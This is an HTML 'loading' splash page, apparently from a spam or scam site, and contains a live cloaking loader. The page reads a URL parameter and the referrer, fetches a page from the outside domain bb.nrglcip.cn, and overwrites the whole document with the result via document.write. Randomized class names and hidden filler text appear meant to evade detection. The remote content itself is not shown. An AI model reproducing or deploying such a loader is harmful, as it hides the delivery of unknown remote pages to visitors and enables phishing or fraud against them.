<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .a6kwZz8c {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .a6kwZz8c .WM187ht {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .a6kwZz8c .content {
            line-height: 50px;
            text-align: center
        }

        .a6kwZz8c .img {
            width: 100%
        }

        .a6kwZz8c .TDTGVCgFpO {
            text-align: center
        }

        .a6kwZz8c .TDTGVCgFpO span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .a6kwZz8c .TDTGVCgFpO span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .a6kwZz8c .TDTGVCgFpO span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .a6kwZz8c .TDTGVCgFpO span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .a6kwZz8c .TDTGVCgFpO span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .a6kwZz8c .TDTGVCgFpO span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .a6kwZz8c .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Iqm5UJH7A5J(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rhoMzNy = Iqm5UJH7A5J('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rhoMzNy +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rhoMzNy +".html?a=share";
		}
		
        FDhS0W=url+"#"+new Date().getTime();
        FDhS0W && function() {
            $.get(FDhS0W, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >oGbqsLzpHQC4WEMWEJYM6DcsbdlIB4S4JiZcvb7tgTGHu0nCu8clj0RtJsBkyPMe9WBqxcbvXK7J</h1>
<ul style='display:none' >J0VazMyA9KV3yesXoDCBGZvGT0</ul>
<ul style='display:none' >J0VazMyA9KV3yesXoDCBGZvGT0</ul>
<h1 style='display:none' >oGbqsLzpHQC4WEMWEJYM6DcsbdlIB4S4JiZcvb7tgTGHu0nCu8clj0RtJsBkyPMe9WBqxcbvXK7J</h1>
<img  src='' style='display:none'>
<h1 style='display:none' >oGbqsLzpHQC4WEMWEJYM6DcsbdlIB4S4JiZcvb7tgTGHu0nCu8clj0RtJsBkyPMe9WBqxcbvXK7J</h1><div class="a6kwZz8c">
    <div class="WM187ht">
        <div class="TDTGVCgFpO">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >ZgbEvT45Uc8Y0HXQJQKt4fWzTJ7EmdHgkrmvw2MYj2mhQXUpQoK2</ul>
<ul style='display:none' >ZgbEvT45Uc8Y0HXQJQKt4fWzTJ7EmdHgkrmvw2MYj2mhQXUpQoK2</ul>
<ul style='display:none' >ZgbEvT45Uc8Y0HXQJQKt4fWzTJ7EmdHgkrmvw2MYj2mhQXUpQoK2</ul>
<a  href='#' style='display:none'>NParKkwGmaRoWdPVm3KdtA7VwDc</a>
<div style='display:none'>wRGKKTKXzDnDJL1fVsIpF</div>
<div style='display:none'>wRGKKTKXzDnDJL1fVsIpF</div>
<a  href='#' style='display:none'>NParKkwGmaRoWdPVm3KdtA7VwDc</a>
<b style='display:none' >hEjrnHgELOmhr</b></body>
</html>